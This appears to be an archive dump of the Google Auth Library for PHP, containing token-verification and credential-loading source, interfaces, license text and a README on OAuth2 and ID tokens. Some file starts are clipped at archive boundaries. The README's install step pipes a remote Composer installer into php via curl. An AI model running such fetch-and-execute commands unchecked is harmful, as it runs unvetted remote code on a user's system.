$audience = null, $issuer = null) { $this->checkAndInitializePhpsec(); $keys = []; foreach ($certs as $cert) { if (empty($cert['kid'])) { throw new InvalidArgumentException( 'certs expects "kid" to be set' ); } if (empty($cert['n']) || empty($cert['e'])) { throw new InvalidArgumentException( 'RSA certs expects "n" and "e" to be set' ); } $publicKey = $this->loadPhpsecPublicKey($cert['n'], $cert['e']); // create an array of key IDs to certs for the JWT library $keys[$cert['kid']] = new Key($publicKey, 'RS256'); } $payload = $this->callJwtStatic('decode', [ $token, $keys, ]); if ($audience) { if (!property_exists($payload, 'aud') || $payload->aud != $audience) { throw new UnexpectedValueException('Audience does not match'); } } // support HTTP and HTTPS issuers // @see https://developers.google.com/identity/sign-in/web/backend-auth $issuers = $issuer ? [$issuer] : [self::OAUTH2_ISSUER, self::OAUTH2_ISSUER_HTTPS]; if (!isset($payload->iss) || !in_array($payload->iss, $issuers)) { throw new UnexpectedValueException('Issuer does not match'); } return (array) $payload; } /** * Revoke an OAuth2 access token or refresh token. This method will revoke the current access * token, if a token isn't provided. * * @param string|array $token The token (access token or a refresh token) that should be revoked. * @param array $options [optional] Configuration options. * @return bool Returns True if the revocation was successful, otherwise False. */ public function revoke($token, array $options = []) { if (is_array($token)) { if (isset($token['refresh_token'])) { $token = $token['refresh_token']; } else { $token = $token['access_token']; } } $body = Utils::streamFor(http_build_query(['token' => $token])); $request = new Request('POST', self::OAUTH2_REVOKE_URI, [ 'Cache-Control' => 'no-store', 'Content-Type' => 'application/x-www-form-urlencoded', ], $body); $httpHandler = $this->httpHandler; $response = $httpHandler($request, $options); return $response->getStatusCode() == 200; } /** * Gets federated sign-on certificates to use for verifying identity tokens. * Returns certs as array structure, where keys are key ids, and values * are PEM encoded certificates. * * @param string $location The location from which to retrieve certs. * @param string $cacheKey The key under which to cache the retrieved certs. * @param array $options [optional] Configuration options. * @return array * @throws InvalidArgumentException If received certs are in an invalid format. */ private function getCerts($location, $cacheKey, array $options = []) { $cacheItem = $this->cache->getItem($cacheKey); $certs = $cacheItem ? $cacheItem->get() : null; $expireTime = null; if (!$certs) { list($certs, $expireTime) = $this->retrieveCertsFromLocation($location, $options); } if (!isset($certs['keys'])) { if ($location !== self::IAP_CERT_URL) { throw new InvalidArgumentException( 'federated sign-on certs expects "keys" to be set' ); } throw new InvalidArgumentException( 'certs expects "keys" to be set' ); } // Push caching off until after verifying certs are in a valid format. // Don't want to cache bad data. if ($expireTime) { $cacheItem->expiresAt(new DateTime($expireTime)); $cacheItem->set($certs); $this->cache->save($cacheItem); } return $certs['keys']; } /** * Retrieve and cache a certificates file. * * @param string $url location * @param array $options [optional] Configuration options. * @return array{array, string} * @throws InvalidArgumentException If certs could not be retrieved from a local file. * @throws RuntimeException If certs could not be retrieved from a remote location. */ private function retrieveCertsFromLocation($url, array $options = []) { // If we're retrieving a local file, just grab it. $expireTime = '+1 hour'; if (strpos($url, 'http') !== 0) { if (!file_exists($url)) { throw new InvalidArgumentException(sprintf( 'Failed to retrieve verification certificates from path: %s.', $url )); } return [ json_decode((string) file_get_contents($url), true), $expireTime ]; } $httpHandler = $this->httpHandler; $response = $httpHandler(new Request('GET', $url), $options); if ($response->getStatusCode() == 200) { if ($cacheControl = $response->getHeaderLine('Cache-Control')) { array_map(function ($value) use (&$expireTime) { list($key, $value) = explode('=', $value) + [null, null]; if (trim($key) == 'max-age') { $expireTime = '+' . $value . ' seconds'; } }, explode(',', $cacheControl)); } return [ json_decode((string) $response->getBody(), true), $expireTime ]; } throw new RuntimeException(sprintf( 'Failed to retrieve verification certificates: "%s".', $response->getBody()->getContents() ), $response->getStatusCode()); } /** * @return void */ private function checkAndInitializePhpsec() { if (!$this->checkAndInitializePhpsec2() && !$this->checkPhpsec3()) { throw new RuntimeException('Please require phpseclib/phpseclib v2 or v3 to use this utility.'); } } /** * @return string * @throws TypeError If the key cannot be initialized to a string. */ private function loadPhpsecPublicKey(string $modulus, string $exponent): string { if (class_exists(RSA::class) && class_exists(BigInteger2::class)) { $key = new RSA(); $key->loadKey([ 'n' => new BigInteger2($this->callJwtStatic('urlsafeB64Decode', [ $modulus, ]), 256), 'e' => new BigInteger2($this->callJwtStatic('urlsafeB64Decode', [ $exponent ]), 256), ]); return $key->getPublicKey(); } $key = PublicKeyLoader::load([ 'n' => new BigInteger3($this->callJwtStatic('urlsafeB64Decode', [ $modulus, ]), 256), 'e' => new BigInteger3($this->callJwtStatic('urlsafeB64Decode', [ $exponent ]), 256), ]); $formattedPublicKey = $key->toString('PKCS8'); if (!is_string($formattedPublicKey)) { throw new TypeError('Failed to initialize the key'); } return $formattedPublicKey; } /** * @return bool */ private function checkAndInitializePhpsec2(): bool { if (!class_exists('phpseclib\Crypt\RSA')) { return false; } /** * phpseclib calls "phpinfo" by default, which requires special * whitelisting in the AppEngine VM environment. This function * sets constants to bypass the need for phpseclib to check phpinfo * * @see phpseclib/Math/BigInteger * @see https://github.com/GoogleCloudPlatform/getting-started-php/issues/85 * @codeCoverageIgnore */ if (filter_var(getenv('GAE_VM'), FILTER_VALIDATE_BOOLEAN)) { if (!defined('MATH_BIGINTEGER_OPENSSL_ENABLED')) { define('MATH_BIGINTEGER_OPENSSL_ENABLED', true); } if (!defined('CRYPT_RSA_MODE')) { define('CRYPT_RSA_MODE', RSA::MODE_OPENSSL); } } return true; } /** * @return bool */ private function checkPhpsec3(): bool { return class_exists('phpseclib3\Crypt\RSA'); } /** * @return void */ private function checkSimpleJwt() { // @codeCoverageIgnoreStart if (!class_exists(SimpleJwt::class)) { throw new RuntimeException('Please require kelvinmo/simplejwt ^0.2 to use this utility.'); } // @codeCoverageIgnoreEnd } /** * Provide a hook to mock calls to the JWT static methods. * * @param string $method * @param array $args * @return mixed */ protected function callJwtStatic($method, array $args = []) { return call_user_func_array([JWT::class, $method], $args); // @phpstan-ignore-line } /** * Provide a hook to mock calls to the JWT static methods. * * @param array $args * @return mixed */ protected function callSimpleJwtDecode(array $args = []) { return call_user_func_array([SimpleJwt::class, 'decode'], $args); } /** * Generate a cache key based on the cert location using sha1 with the * exception of using "federated_signon_certs_v3" to preserve BC. * * @param string $certsLocation * @return string */ private function getCacheKeyFromCertLocation($certsLocation) { $key = $certsLocation === self::FEDERATED_SIGNON_CERT_URL ? 'federated_signon_certs_v3' : sha1($certsLocation); return 'google_auth_certs_cache|' . $key; } } google-api/vendor/google/auth/src/UpdateMetadataInterface.php000064400000002335147600400120020302 0ustar00 $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array updated metadata hashmap */ public function updateMetadata( $metadata, $authUri = null, callable $httpHandler = null ); } google-api/vendor/google/auth/src/ProjectIdProviderInterface.php000064400000001702147600400120021012 0ustar00push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'google_auth' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); * ``` */ class ApplicationDefaultCredentials { /** * @deprecated * * Obtains an AuthTokenSubscriber that uses the default FetchAuthTokenInterface * implementation to use in this environment. * * If supplied, $scope is used to in creating the credentials instance if * this does not fallback to the compute engine defaults. * * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param callable $httpHandler callback which delivers psr7 request * @param array $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @return AuthTokenSubscriber * @throws DomainException if no implementation can be obtained. */ public static function getSubscriber(// @phpstan-ignore-line $scope = null, callable $httpHandler = null, array $cacheConfig = null, CacheItemPoolInterface $cache = null ) { $creds = self::getCredentials($scope, $httpHandler, $cacheConfig, $cache); /** @phpstan-ignore-next-line */ return new AuthTokenSubscriber($creds, $httpHandler); } /** * Obtains an AuthTokenMiddleware that uses the default FetchAuthTokenInterface * implementation to use in this environment. * * If supplied, $scope is used to in creating the credentials instance if * this does not fallback to the compute engine defaults. * * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param callable $httpHandler callback which delivers psr7 request * @param array $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @param string $quotaProject specifies a project to bill for access * charges associated with the request. * @return AuthTokenMiddleware * @throws DomainException if no implementation can be obtained. */ public static function getMiddleware( $scope = null, callable $httpHandler = null, array $cacheConfig = null, CacheItemPoolInterface $cache = null, $quotaProject = null ) { $creds = self::getCredentials($scope, $httpHandler, $cacheConfig, $cache, $quotaProject); return new AuthTokenMiddleware($creds, $httpHandler); } /** * Obtains the default FetchAuthTokenInterface implementation to use * in this environment. * * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param callable $httpHandler callback which delivers psr7 request * @param array $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @param string $quotaProject specifies a project to bill for access * charges associated with the request. * @param string|string[] $defaultScope The default scope to use if no * user-defined scopes exist, expressed either as an Array or as a * space-delimited string. * @param string $universeDomain Specifies a universe domain to use for the * calling client library * * @return FetchAuthTokenInterface * @throws DomainException if no implementation can be obtained. */ public static function getCredentials( $scope = null, callable $httpHandler = null, array $cacheConfig = null, CacheItemPoolInterface $cache = null, $quotaProject = null, $defaultScope = null, string $universeDomain = null ) { $creds = null; $jsonKey = CredentialsLoader::fromEnv() ?: CredentialsLoader::fromWellKnownFile(); $anyScope = $scope ?: $defaultScope; if (!$httpHandler) { if (!($client = HttpClientCache::getHttpClient())) { $client = new Client(); HttpClientCache::setHttpClient($client); } $httpHandler = HttpHandlerFactory::build($client); } if (is_null($quotaProject)) { // if a quota project isn't specified, try to get one from the env var $quotaProject = CredentialsLoader::quotaProjectFromEnv(); } if (!is_null($jsonKey)) { if ($quotaProject) { $jsonKey['quota_project_id'] = $quotaProject; } if ($universeDomain) { $jsonKey['universe_domain'] = $universeDomain; } $creds = CredentialsLoader::makeCredentials( $scope, $jsonKey, $defaultScope ); } elseif (AppIdentityCredentials::onAppEngine() && !GCECredentials::onAppEngineFlexible()) { $creds = new AppIdentityCredentials($anyScope); } elseif (self::onGce($httpHandler, $cacheConfig, $cache)) { $creds = new GCECredentials(null, $anyScope, null, $quotaProject, null, $universeDomain); $creds->setIsOnGce(true); // save the credentials a trip to the metadata server } if (is_null($creds)) { throw new DomainException(self::notFound()); } if (!is_null($cache)) { $creds = new FetchAuthTokenCache($creds, $cacheConfig, $cache); } return $creds; } /** * Obtains an AuthTokenMiddleware which will fetch an ID token to use in the * Authorization header. The middleware is configured with the default * FetchAuthTokenInterface implementation to use in this environment. * * If supplied, $targetAudience is used to set the "aud" on the resulting * ID token. * * @param string $targetAudience The audience for the ID token. * @param callable $httpHandler callback which delivers psr7 request * @param array $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @return AuthTokenMiddleware * @throws DomainException if no implementation can be obtained. */ public static function getIdTokenMiddleware( $targetAudience, callable $httpHandler = null, array $cacheConfig = null, CacheItemPoolInterface $cache = null ) { $creds = self::getIdTokenCredentials($targetAudience, $httpHandler, $cacheConfig, $cache); return new AuthTokenMiddleware($creds, $httpHandler); } /** * Obtains an ProxyAuthTokenMiddleware which will fetch an ID token to use in the * Authorization header. The middleware is configured with the default * FetchAuthTokenInterface implementation to use in this environment. * * If supplied, $targetAudience is used to set the "aud" on the resulting * ID token. * * @param string $targetAudience The audience for the ID token. * @param callable $httpHandler callback which delivers psr7 request * @param array $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @return ProxyAuthTokenMiddleware * @throws DomainException if no implementation can be obtained. */ public static function getProxyIdTokenMiddleware( $targetAudience, callable $httpHandler = null, array $cacheConfig = null, CacheItemPoolInterface $cache = null ) { $creds = self::getIdTokenCredentials($targetAudience, $httpHandler, $cacheConfig, $cache); return new ProxyAuthTokenMiddleware($creds, $httpHandler); } /** * Obtains the default FetchAuthTokenInterface implementation to use * in this environment, configured with a $targetAudience for fetching an ID * token. * * @param string $targetAudience The audience for the ID token. * @param callable $httpHandler callback which delivers psr7 request * @param array $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache A cache implementation, may be * provided if you have one already available for use. * @return FetchAuthTokenInterface * @throws DomainException if no implementation can be obtained. * @throws InvalidArgumentException if JSON "type" key is invalid */ public static function getIdTokenCredentials( $targetAudience, callable $httpHandler = null, array $cacheConfig = null, CacheItemPoolInterface $cache = null ) { $creds = null; $jsonKey = CredentialsLoader::fromEnv() ?: CredentialsLoader::fromWellKnownFile(); if (!$httpHandler) { if (!($client = HttpClientCache::getHttpClient())) { $client = new Client(); HttpClientCache::setHttpClient($client); } $httpHandler = HttpHandlerFactory::build($client); } if (!is_null($jsonKey)) { if (!array_key_exists('type', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the type field'); } if ($jsonKey['type'] == 'authorized_user') { throw new InvalidArgumentException('ID tokens are not supported for end user credentials'); } if ($jsonKey['type'] != 'service_account') { throw new InvalidArgumentException('invalid value in the type field'); } $creds = new ServiceAccountCredentials(null, $jsonKey, null, $targetAudience); } elseif (self::onGce($httpHandler, $cacheConfig, $cache)) { $creds = new GCECredentials(null, null, $targetAudience); $creds->setIsOnGce(true); // save the credentials a trip to the metadata server } if (is_null($creds)) { throw new DomainException(self::notFound()); } if (!is_null($cache)) { $creds = new FetchAuthTokenCache($creds, $cacheConfig, $cache); } return $creds; } /** * @return string */ private static function notFound() { $msg = 'Your default credentials were not found. To set up '; $msg .= 'Application Default Credentials, see '; $msg .= 'https://cloud.google.com/docs/authentication/external/set-up-adc'; return $msg; } /** * @param callable $httpHandler * @param array $cacheConfig * @param CacheItemPoolInterface $cache * @return bool */ private static function onGce( callable $httpHandler = null, array $cacheConfig = null, CacheItemPoolInterface $cache = null ) { $gceCacheConfig = []; foreach (['lifetime', 'prefix'] as $key) { if (isset($cacheConfig['gce_' . $key])) { $gceCacheConfig[$key] = $cacheConfig['gce_' . $key]; } } return (new GCECache($gceCacheConfig, $cache))->onGce($httpHandler); } } google-api/vendor/google/auth/src/FetchAuthTokenInterface.php000064400000003203147600400120020266 0ustar00 a hash of auth tokens */ public function fetchAuthToken(callable $httpHandler = null); /** * Obtains a key that can used to cache the results of #fetchAuthToken. * * If the value is empty, the auth token is not cached. * * @return string a key that may be used to cache the auth token. */ public function getCacheKey(); /** * Returns an associative array with the token and * expiration time. * * @return null|array { * The last received access token. * * @type string $access_token The access token string. * @type int $expires_at The time the token expires as a UNIX timestamp. * } */ public function getLastReceivedToken(); } google-api/vendor/google/auth/SECURITY.md000064400000000511147600400120014061 0ustar00# Security Policy To report a security issue, please use [g.co/vulnz](https://g.co/vulnz). The Google Security Team will respond within 5 working days of your report on g.co/vulnz. We use g.co/vulnz for our intake, and do coordination and disclosure here using GitHub Security Advisory to privately discuss and fix the issue. google-api/vendor/google/auth/VERSION000064400000000007147600400120013340 0ustar001.33.0 google-api/vendor/google/auth/COPYING000064400000026116147600400120013334 0ustar00 Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." 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Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright 2015 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. google-api/vendor/google/auth/autoload.php000064400000002133147600400120014613 0ustar00 3) { // Maximum class file path depth in this project is 3. $classPath = array_slice($classPath, 0, 3); } $filePath = dirname(__FILE__) . '/src/' . implode('/', $classPath) . '.php'; if (file_exists($filePath)) { require_once $filePath; } } spl_autoload_register('oauth2client_php_autoload'); google-api/vendor/google/auth/README.md000064400000026077147600400120013566 0ustar00# Google Auth Library for PHP
Reference Docs
Tim Emiola
Stanley Cheung
Brent Shaffer
Copyright © 2015 Google, Inc.
Apache 2.0
## Description This is Google's officially supported PHP client library for using OAuth 2.0 authorization and authentication with Google APIs. ### Installing via Composer The recommended way to install the google auth library is through [Composer](http://getcomposer.org). ```bash # Install Composer curl -sS https://getcomposer.org/installer | php ``` Next, run the Composer command to install the latest stable version: ```bash composer.phar require google/auth ``` ## Application Default Credentials This library provides an implementation of [application default credentials][application default credentials] for PHP. The Application Default Credentials provide a simple way to get authorization credentials for use in calling Google APIs. They are best suited for cases when the call needs to have the same identity and authorization level for the application independent of the user. This is the recommended approach to authorize calls to Cloud APIs, particularly when you're building an application that uses Google Compute Engine. #### Download your Service Account Credentials JSON file To use `Application Default Credentials`, You first need to download a set of JSON credentials for your project. Go to **APIs & Services** > **Credentials** in the [Google Developers Console][developer console] and select **Service account** from the **Add credentials** dropdown. > This file is your *only copy* of these credentials. It should never be > committed with your source code, and should be stored securely. Once downloaded, store the path to this file in the `GOOGLE_APPLICATION_CREDENTIALS` environment variable. ```php putenv('GOOGLE_APPLICATION_CREDENTIALS=/path/to/my/credentials.json'); ``` > PHP's `putenv` function is just one way to set an environment variable. > Consider using `.htaccess` or apache configuration files as well. #### Enable the API you want to use Before making your API call, you must be sure the API you're calling has been enabled. Go to **APIs & Auth** > **APIs** in the [Google Developers Console][developer console] and enable the APIs you'd like to call. For the example below, you must enable the `Drive API`. #### Call the APIs As long as you update the environment variable below to point to *your* JSON credentials file, the following code should output a list of your Drive files. ```php use Google\Auth\ApplicationDefaultCredentials; use GuzzleHttp\Client; use GuzzleHttp\HandlerStack; // specify the path to your application credentials putenv('GOOGLE_APPLICATION_CREDENTIALS=/path/to/my/credentials.json'); // define the scopes for your API call $scopes = ['https://www.googleapis.com/auth/drive.readonly']; // create middleware $middleware = ApplicationDefaultCredentials::getMiddleware($scopes); $stack = HandlerStack::create(); $stack->push($middleware); // create the HTTP client $client = new Client([ 'handler' => $stack, 'base_uri' => 'https://www.googleapis.com', 'auth' => 'google_auth' // authorize all requests ]); // make the request $response = $client->get('drive/v2/files'); // show the result! print_r((string) $response->getBody()); ``` ##### Guzzle 5 Compatibility If you are using [Guzzle 5][Guzzle 5], replace the `create middleware` and `create the HTTP Client` steps with the following: ```php // create the HTTP client $client = new Client([ 'base_url' => 'https://www.googleapis.com', 'auth' => 'google_auth' // authorize all requests ]); // create subscriber $subscriber = ApplicationDefaultCredentials::getSubscriber($scopes); $client->getEmitter()->attach($subscriber); ``` #### Call using an ID Token If your application is running behind Cloud Run, or using Cloud Identity-Aware Proxy (IAP), you will need to fetch an ID token to access your application. For this, use the static method `getIdTokenMiddleware` on `ApplicationDefaultCredentials`. ```php use Google\Auth\ApplicationDefaultCredentials; use GuzzleHttp\Client; use GuzzleHttp\HandlerStack; // specify the path to your application credentials putenv('GOOGLE_APPLICATION_CREDENTIALS=/path/to/my/credentials.json'); // Provide the ID token audience. This can be a Client ID associated with an IAP application, // Or the URL associated with a CloudRun App // $targetAudience = 'IAP_CLIENT_ID.apps.googleusercontent.com'; // $targetAudience = 'https://service-1234-uc.a.run.app'; $targetAudience = 'YOUR_ID_TOKEN_AUDIENCE'; // create middleware $middleware = ApplicationDefaultCredentials::getIdTokenMiddleware($targetAudience); $stack = HandlerStack::create(); $stack->push($middleware); // create the HTTP client $client = new Client([ 'handler' => $stack, 'auth' => 'google_auth', // Cloud Run, IAP, or custom resource URL 'base_uri' => 'https://YOUR_PROTECTED_RESOURCE', ]); // make the request $response = $client->get('/'); // show the result! print_r((string) $response->getBody()); ``` For invoking Cloud Run services, your service account will need the [`Cloud Run Invoker`](https://cloud.google.com/run/docs/authenticating/service-to-service) IAM permission. For invoking Cloud Identity-Aware Proxy, you will need to pass the Client ID used when you set up your protected resource as the target audience. See how to [secure your IAP app with signed headers](https://cloud.google.com/iap/docs/signed-headers-howto). #### Call using a specific JSON key If you want to use a specific JSON key instead of using `GOOGLE_APPLICATION_CREDENTIALS` environment variable, you can do this: ```php use Google\Auth\CredentialsLoader; use Google\Auth\Middleware\AuthTokenMiddleware; use GuzzleHttp\Client; use GuzzleHttp\HandlerStack; // Define the Google Application Credentials array $jsonKey = ['key' => 'value']; // define the scopes for your API call $scopes = ['https://www.googleapis.com/auth/drive.readonly']; // Load credentials $creds = CredentialsLoader::makeCredentials($scopes, $jsonKey); // optional caching // $creds = new FetchAuthTokenCache($creds, $cacheConfig, $cache); // create middleware $middleware = new AuthTokenMiddleware($creds); $stack = HandlerStack::create(); $stack->push($middleware); // create the HTTP client $client = new Client([ 'handler' => $stack, 'base_uri' => 'https://www.googleapis.com', 'auth' => 'google_auth' // authorize all requests ]); // make the request $response = $client->get('drive/v2/files'); // show the result! print_r((string) $response->getBody()); ``` #### Call using Proxy-Authorization Header If your application is behind a proxy such as [Google Cloud IAP][iap-proxy-header], and your application occupies the `Authorization` request header, you can include the ID token in a `Proxy-Authorization: Bearer` header instead. If a valid ID token is found in a `Proxy-Authorization` header, IAP authorizes the request with it. After authorizing the request, IAP passes the Authorization header to your application without processing the content. For this, use the static method `getProxyIdTokenMiddleware` on `ApplicationDefaultCredentials`. ```php use Google\Auth\ApplicationDefaultCredentials; use GuzzleHttp\Client; use GuzzleHttp\HandlerStack; // specify the path to your application credentials putenv('GOOGLE_APPLICATION_CREDENTIALS=/path/to/my/credentials.json'); // Provide the ID token audience. This can be a Client ID associated with an IAP application // $targetAudience = 'IAP_CLIENT_ID.apps.googleusercontent.com'; $targetAudience = 'YOUR_ID_TOKEN_AUDIENCE'; // create middleware $middleware = ApplicationDefaultCredentials::getProxyIdTokenMiddleware($targetAudience); $stack = HandlerStack::create(); $stack->push($middleware); // create the HTTP client $client = new Client([ 'handler' => $stack, 'auth' => ['username', 'pass'], // auth option handled by your application 'proxy_auth' => 'google_auth', ]); // make the request $response = $client->get('/'); // show the result! print_r((string) $response->getBody()); ``` [iap-proxy-header]: https://cloud.google.com/iap/docs/authentication-howto#authenticating_from_proxy-authorization_header #### External credentials (Workload identity federation) Using workload identity federation, your application can access Google Cloud resources from Amazon Web Services (AWS), Microsoft Azure or any identity provider that supports OpenID Connect (OIDC). Traditionally, applications running outside Google Cloud have used service account keys to access Google Cloud resources. Using identity federation, you can allow your workload to impersonate a service account. This lets you access Google Cloud resources directly, eliminating the maintenance and security burden associated with service account keys. Follow the detailed instructions on how to [Configure Workload Identity Federation](https://cloud.google.com/iam/docs/workload-identity-federation-with-other-clouds). #### Verifying JWTs If you are [using Google ID tokens to authenticate users][google-id-tokens], use the `Google\Auth\AccessToken` class to verify the ID token: ```php use Google\Auth\AccessToken; $auth = new AccessToken(); $auth->verify($idToken); ``` If your app is running behind [Google Identity-Aware Proxy][iap-id-tokens] (IAP), you can verify the ID token coming from the IAP server by pointing to the appropriate certificate URL for IAP. This is because IAP signs the ID tokens with a different key than the Google Identity service: ```php use Google\Auth\AccessToken; $auth = new AccessToken(); $auth->verify($idToken, [ 'certsLocation' => AccessToken::IAP_CERT_URL ]); ``` [google-id-tokens]: https://developers.google.com/identity/sign-in/web/backend-auth [iap-id-tokens]: https://cloud.google.com/iap/docs/signed-headers-howto ## License This library is licensed under Apache 2.0. Full license text is available in [COPYING][copying]. ## Contributing See [CONTRIBUTING][contributing]. ## Support Please [report bugs at the project on Github](https://github.com/google/google-auth-library-php/issues). Don't hesitate to [ask questions](http://stackoverflow.com/questions/tagged/google-auth-library-php) about the client or APIs on [StackOverflow](http://stackoverflow.com). [google-apis-php-client]: https://github.com/google/google-api-php-client [application default credentials]: https://developers.google.com/accounts/docs/application-default-credentials [contributing]: https://github.com/google/google-auth-library-php/tree/main/.github/CONTRIBUTING.md [copying]: https://github.com/google/google-auth-library-php/tree/main/COPYING [Guzzle]: https://github.com/guzzle/guzzle [Guzzle 5]: http://docs.guzzlephp.org/en/5.3 [developer console]: https://console.developers.google.com google-api/vendor/google/auth/LICENSE000064400000024020147600400120013276 0ustar00Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under 